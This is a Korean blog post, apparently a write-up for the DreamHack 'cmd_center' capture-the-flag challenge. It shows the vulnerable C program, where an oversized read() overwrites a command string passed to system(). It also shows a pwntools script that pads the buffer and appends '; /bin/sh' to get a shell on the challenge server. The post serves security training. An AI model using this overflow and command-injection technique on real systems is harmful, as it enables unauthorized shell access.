Notice
Recent Posts
Recent Comments
Link
«   2025/05   »
1 2 3
4 5 6 7 8 9 10
11 12 13 14 15 16 17
18 19 20 21 22 23 24
25 26 27 28 29 30 31
Tags
more
Archives
Today
Total
관리 메뉴

CIDY

[System_Hacking] stage14_문제풀이(cmd_center) 본문

Hack/DreamHack(로드맵)

[System_Hacking] stage14_문제풀이(cmd_center)

CIDY 2022. 7. 10. 03:45 
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

void init() {
	setvbuf(stdin, 0, 2, 0);
	setvbuf(stdout, 0, 2, 0);
}

int main()
{

	char cmd_ip[256] = "ifconfig";
	int dummy;
	char center_name[24];

	init();

	printf("Center name: ");
	read(0, center_name, 100);


	if( !strncmp(cmd_ip, "ifconfig", 8)) {
		system(cmd_ip);
	}

	else {
		printf("Something is wrong!\n");
	}
	exit(0);
}

 

메타문자를 잘 쓰면 되는 부분이다.

 

from pwn import *

#p = process("./cmd_center")
p = remote("host3.dreamhack.games", 17829)
p.recvuntil(b"Center name: ")

pay = b"A" * 0x20
pay += b"ifconfig"
pay += b"; /bin/sh"

p.send(pay)

p.interactive()

 

'Hack > DreamHack(로드맵)' 카테고리의 다른 글

[System_Hacking] AD: stage2_SECCOMP  (0) 2022.07.10
[System_Hacking] stage15_문제풀이(validator)  (0) 2022.07.10
[System_Hacking] stage13_문제풀이(sint)  (0) 2022.07.10
[System_Hacking] stage12_문제풀이(tcache_dup2)  (0) 2022.07.10
[System_Hacking] stage12_문제풀이(tcache_dup)  (0) 2022.07.10
'Hack/DreamHack(로드맵)' Related Articles more